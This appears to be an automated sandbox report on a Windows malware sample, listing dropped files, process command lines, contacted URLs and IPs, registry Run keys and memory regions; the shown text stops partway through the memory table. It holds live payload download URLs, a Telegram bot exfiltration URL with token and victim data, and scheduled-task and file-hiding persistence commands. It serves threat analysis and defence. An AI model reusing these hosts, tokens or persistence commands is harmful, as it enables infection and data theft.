Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
file.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Program Files\Windows Media Player\graph\graph.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
|
PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\output[1].png
|
PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sendMessage[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qolotyr.qso.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cymooykj.ued.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epjltkj1.ctt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdreki0v.dd0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryjtbzav.q4g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vr43atyx.lq1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\7z.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\file.bin
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\file.zip (copy)
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\main\main.bat
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
|
JSON data
|
dropped
|
||
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
|
PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
|
JSON data
|
dropped
|
||
C:\Windows\Tasks\Gxtuum.job
|
data
|
dropped
|
||
C:\Windows\Tasks\skotes.job
|
data
|
dropped
|
||
\Device\ConDrv
|
Non-ISO extended-ASCII text, with CRLF line terminators
|
dropped
|
There are 43 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
||
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
|
"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
|
||
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
|
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
|
||
C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe
|
"C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
|
||
C:\Windows\System32\attrib.exe
|
attrib +H "in.exe"
|
||
C:\Users\user\AppData\Local\Temp\main\in.exe
|
"in.exe"
|
||
C:\Windows\System32\attrib.exe
|
attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\System32\attrib.exe
|
attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe"
/SC MINUTE
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell ping 127.0.0.1; del in.exe
|
||
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
||
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\explorer.exe
|
explorer.exe
|
||
C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe
|
"C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.1.10.1
|
||
C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe
|
"C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe"
|
||
C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
|
"C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
|
||
C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
|
C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
|
||
C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
|
"C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe"
|
||
C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
|
C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
|
||
C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe
|
"C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe"
|
||
C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe
|
"C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe"
|
||
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\explorer.exe
|
explorer.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
|
||
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.1.10.1
|
||
C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe
|
"C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\mode.com
|
mode 65,10
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_7.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_6.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_5.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_4.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_3.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_2.zip -oextracted
|
||
C:\Users\user\AppData\Local\Temp\main\7z.exe
|
7z.exe e extracted/file_1.zip -oextracted
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Windows Media Player\graph\graph.exe
|
"C:\Program Files\Windows Media Player\graph\graph.exe"
|
||
C:\Program Files\Windows Media Player\graph\graph.exe
|
"C:\Program Files\Windows Media Player\graph\graph.exe"
|
||
C:\Program Files\Windows Media Player\graph\graph.exe
|
"C:\Program Files\Windows Media Player\graph\graph.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 39 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://212.193.31.8/3ofn3jf3e2ljk2/index.php
|
212.193.31.8
|
||
treehoneyi.click
|
|||
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
|
185.121.15.192
|
||
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
https://api.telegram.org/grkrs
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://ipinfo.io/missingauth
|
unknown
|
||
https://cheapptaxysu.click/apiIN
|
unknown
|
||
https://www.google.com/vate
|
unknown
|
||
http://31.41.244.11/files/karl/random.exexe
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
|
unknown
|
||
https://api.telegram.org/:Gr
|
unknown
|
||
http://31.41.244.11/files/karl/random.exe8476
|
unknown
|
||
https://api.telegram.org/-GB
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://cheapptaxysu.click/api:L_
|
unknown
|
||
https://drive.google.com/uc?id=URL:
|
unknown
|
||
https://cheapptaxysu.click/api%L8
|
unknown
|
||
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
|
unknown
|
||
https://www.google.com/aome
|
unknown
|
||
https://ipinfo.io/jsonN/Aipcountry
|
unknown
|
||
aspecteirs.lat
|
|||
http://31.41.244.11/files/burpin1/random.exe6H
|
unknown
|
||
http://185.215.113.43/Zu7JuNko/index.phpnu
|
unknown
|
||
https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
|
unknown
|
||
https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
|
unknown
|
||
https://docs.google.com/
|
unknown
|
||
https://www.google.com/olhkhi
|
unknown
|
||
https://curl.se/docs/hsts.html
|
unknown
|
||
http://185.215.113.43/Zu7JuNko/index.php
|
185.215.113.43
|
||
https://payments.google.com/payments/v4/js/integrator.jsBACCDE8AZo
|
unknown
|
||
http://31.41.244.11/files/karl/random.exeO:
|
unknown
|
||
https://cheapptaxysu.click/api5RJ1JZ
|
unknown
|
||
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
http://31.41.244.11/files/burpin1/random.exeD
|
unknown
|
||
http://212.193.31.8/3ofn3jf3e2ljk2/index.phpf-
|
unknown
|
||
http://31.41.244.11/files/burpin1/random.exeC
|
unknown
|
||
https://ipinfo.io/json
|
34.117.59.81
|
||
sustainskelet.lat
|
|||
https://drive-daily-3.corp.google.cosB
|
unknown
|
||
rapeflowwj.lat
|
|||
http://212.193.31.8/3ofn3jf3e2ljk2/index.phped
|
unknown
|
||
https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
|
unknown
|
||
https://cheapptaxysu.click/9
|
unknown
|
||
https://drive.usercontent.google.com/i
|
unknown
|
||
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML
|
149.154.167.220
|
||
https://api.telegram.org/ogle
|
unknown
|
||
http://31.41.244.11/files/karl/random.exe
|
unknown
|
||
https://chrome.google.com/webstore
|
unknown
|
||
https://sandbox.google.com/payments/v4/js/integrator.jsCF630DF4
|
unknown
|
||
https://cheapptaxysu.click/apioca
|
unknown
|
||
https://drive-daily-2.corp.google.com/
|
unknown
|
||
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
https://api.telegram.org/1
|
unknown
|
||
https://drive-daily-4.corp.google.com/
|
unknown
|
||
https://treehoneyi.click/api$
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
https://payments.google.com/payments/v4/js/integrator.js9A495B9est
|
unknown
|
||
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
|
unknown
|
||
https://drive.google.com/uc?id=
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://curl.se/docs/alt-svc.html
|
unknown
|
||
https://xmrig.com/wizard
|
unknown
|
||
energyaffai.lat
|
|||
https://cheapptaxysu.click/Q
|
unknown
|
||
https://cheapptaxysu.click/apiCN
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://drive-daily-1.corp.google.com/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
http://31.41.244.11/files/martin/random.exe
|
unknown
|
||
https://drive-daily-5.corp.google.com/
|
unknown
|
||
https://ipinfo.io/D
|
unknown
|
||
https://treehoneyi.click/
|
unknown
|
||
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
https://httpbin.org/ipbefore
|
unknown
|
||
https://treehoneyi.click/api
|
unknown
|
||
https://www.google.com/s
|
unknown
|
||
https://ipinfo.io/
|
unknown
|
||
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763G
|
unknown
|
||
https://ipinfo.io/1
|
unknown
|
||
http://31.41.244.11/files/geopoxid/random.exe
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
|
unknown
|
||
https://drive-preprod.co
|
unknown
|
||
https://ipinfo.io/na
|
unknown
|
||
https://support.microsof
|
unknown
|
||
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
|
185.121.15.192
|
||
https://payments.google.com/payments/v4/js/integrator.js60335477Zu
|
unknown
|
||
https://drive-preprod.corp.google.com/
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
grannyejh.lat
|
|||
https://chrome.google.com/webstore-l
|
unknown
|
||
https://sandbox.google.com/
|
unknown
|
||
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultr
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
home.fivetk5ht.top
|
185.121.15.192
|
||
treehoneyi.click
|
104.21.91.209
|
||
cheapptaxysu.click
|
104.21.67.146
|
||
ipinfo.io
|
34.117.59.81
|
||
drive.google.com
|
172.217.17.46
|
||
drive.usercontent.google.com
|
172.217.17.65
|
||
api.telegram.org
|
149.154.167.220
|
||
httpbin.org
|
98.85.100.80
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.215.113.43
|
unknown
|
Portugal
|
||
212.193.31.8
|
unknown
|
Russian Federation
|
||
127.0.0.1
|
unknown
|
unknown
|
||
127.1.10.1
|
unknown
|
unknown
|
||
185.121.15.192
|
home.fivetk5ht.top
|
Spain
|
||
98.85.100.80
|
httpbin.org
|
United States
|
||
172.217.17.46
|
drive.google.com
|
United States
|
||
34.117.59.81
|
ipinfo.io
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
104.21.91.209
|
treehoneyi.click
|
United States
|
||
172.217.17.65
|
drive.usercontent.google.com
|
United States
|
||
104.21.67.146
|
cheapptaxysu.click
|
United States
|
||
31.41.244.11
|
unknown
|
Russian Federation
|
There are 3 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Graph
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
|
Graph
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1319000
|
heap
|
page read and write
|
||
13C8000
|
heap
|
page read and write
|
||
151000
|
unkown
|
page execute and read and write
|
||
12F9000
|
heap
|
page read and write
|
||
4AB0000
|
direct allocation
|
page read and write
|
||
1FE626E0000
|
unkown
|
page read and write
|
||
1402DD000
|
unkown
|
page readonly
|
||
6D7000
|
heap
|
page read and write
|
||
6F9000
|
heap
|
page read and write
|
||
1402DD000
|
unkown
|
page readonly
|
||
14040B000
|
unkown
|
page read and write
|
||
52E0000
|
direct allocation
|
page read and write
|
||
714000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
14040B000
|
unkown
|
page read and write
|
||
AF1000
|
unkown
|
page execute and read and write
|
||
151000
|
unkown
|
page execute and read and write
|
||
202AA9D0000
|
unkown
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
3FAF000
|
stack
|
page read and write
|
||
334000
|
unkown
|
page execute and read and write
|
||
2E2F000
|
stack
|
page read and write
|
||
7FF6BDA40000
|
unkown
|
page readonly
|
||
574E000
|
stack
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
2321000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C61A5FF000
|
stack
|
page read and write
|
||
56C5000
|
trusted library allocation
|
page read and write
|
||
7FF6BDA5D000
|
unkown
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
2E6E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
2A0000
|
unkown
|
page readonly
|
||
1E365839000
|
heap
|
page read and write
|
||
B181DFF000
|
stack
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
650E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
3A9E000
|
stack
|
page read and write
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
1660000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
45D000
|
unkown
|
page execute and read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
79CF000
|
heap
|
page read and write
|
||
4590000
|
heap
|
page read and write
|
||
7FF69F4CF000
|
unkown
|
page write copy
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
447000
|
unkown
|
page execute and write copy
|
||
1E40000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
31DE000
|
stack
|
page read and write
|
||
157E000
|
stack
|
page read and write
|
||
53AE000
|
stack
|
page read and write
|
||
56BD000
|
trusted library allocation
|
page read and write
|
||
709000
|
heap
|
page read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
7A81000
|
heap
|
page read and write
|
||
1790000
|
heap
|
page read and write
|
||
504F000
|
stack
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
CDB000
|
stack
|
page read and write
|
||
39A000
|
unkown
|
page execute and read and write
|
||
177C000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
1E365780000
|
heap
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
56CD000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
332F000
|
stack
|
page read and write
|
||
485E000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
1370000
|
trusted library allocation
|
page read and write
|
||
37AE000
|
stack
|
page read and write
|
||
26810A1C000
|
heap
|
page read and write
|
||
1621000
|
heap
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
47653FE000
|
stack
|
page read and write
|
||
11FA000
|
heap
|
page read and write
|
||
7FF6BDA40000
|
unkown
|
page readonly
|
||
DEF000
|
unkown
|
page execute and write copy
|
||
D8D000
|
heap
|
page read and write
|
||
1E36581A000
|
heap
|
page read and write
|
||
568B000
|
trusted library allocation
|
page read and write
|
||
5200000
|
remote allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1D566A00000
|
heap
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
37DF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
17B5000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
15B1000
|
heap
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
2032F030000
|
direct allocation
|
page read and write
|
||
114E000
|
stack
|
page read and write
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
39AE000
|
stack
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
9C0000
|
unkown
|
page readonly
|
||
248C0560000
|
heap
|
page read and write
|
||
17E0000
|
heap
|
page read and write
|
||
DE7000
|
unkown
|
page execute and write copy
|
||
44C000
|
heap
|
page read and write
|
||
2A1F000
|
stack
|
page read and write
|
||
17BE000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
87FE000
|
stack
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
583D000
|
trusted library allocation
|
page read and write
|
||
1D5669A0000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page execute and write copy
|
||
150000
|
unkown
|
page readonly
|
||
1504000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
5674000
|
trusted library allocation
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
99E000
|
stack
|
page read and write
|
||
17DF000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
AFD000
|
stack
|
page read and write
|
||
31DC000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
41A000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
342000
|
unkown
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5678000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
56C8000
|
trusted library allocation
|
page read and write
|
||
268109D5000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
6AEF000
|
stack
|
page read and write
|
||
54A0000
|
direct allocation
|
page execute and read and write
|
||
1FDEBC10000
|
heap
|
page read and write
|
||
1F13000
|
heap
|
page read and write
|
||
7FF69F4C8000
|
unkown
|
